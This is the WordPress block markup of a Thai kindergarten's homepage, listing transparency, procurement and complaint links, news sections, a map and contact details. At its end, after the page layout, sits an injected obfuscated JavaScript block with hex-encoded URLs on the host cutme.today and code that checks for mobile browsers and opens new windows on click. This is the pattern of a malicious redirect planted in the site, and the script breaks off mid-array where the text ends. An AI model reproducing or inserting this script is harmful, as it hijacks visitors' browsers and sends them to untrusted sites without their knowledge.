data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  สถิติการมาเรียน <br>      -  ตรวจสอบผลการเรียน<br>      -  <a href=\"https://www.facebook.com/obec.go.th/?locale=th_TH\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\